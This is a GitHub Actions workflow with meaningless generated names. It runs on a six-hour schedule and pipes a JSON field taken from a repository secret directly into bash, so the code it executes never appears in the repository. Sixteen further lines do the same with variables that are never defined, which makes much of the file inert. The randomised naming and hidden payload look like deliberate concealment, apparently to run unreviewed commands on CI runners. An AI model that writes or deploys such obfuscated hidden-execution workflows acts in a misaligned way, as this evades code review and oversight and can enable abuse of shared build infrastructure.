name: diurenly

on:
  workflow_dispatch:
  schedule:
    - cron: '27 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: diurenly
        env:
          zimnj31: ${{ secrets.zimnj31 }}
        run: |
          echo $zimnj31 | jq -r .odz73558 | /bin/bash
          echo $yp43 | jq -r .xtqjf7 | /bin/bash
          echo $t386 | jq -r .sx207 | /bin/bash
          echo $jvx6 | jq -r .u85440 | /bin/bash
          echo $p7 | jq -r .bhhm8791 | /bin/bash
          echo $d6 | jq -r .sn2849 | /bin/bash
          echo $nmq3 | jq -r .met1 | /bin/bash
          echo $s72163 | jq -r .six30637 | /bin/bash
          echo $lpfh1547 | jq -r .vj5095 | /bin/bash
          echo $azt884 | jq -r .np4596 | /bin/bash
          echo $gys70813 | jq -r .dxb3547 | /bin/bash
          echo $zvexf520 | jq -r .r08 | /bin/bash
          echo $afwuz2333 | jq -r .xmz84329 | /bin/bash
          echo $mta4669 | jq -r .ruwf6385 | /bin/bash
          echo $y01372 | jq -r .txrt583 | /bin/bash
          echo $zyerp3 | jq -r .ll27755 | /bin/bash
          echo $bl00171 | jq -r .j54162 | /bin/bash

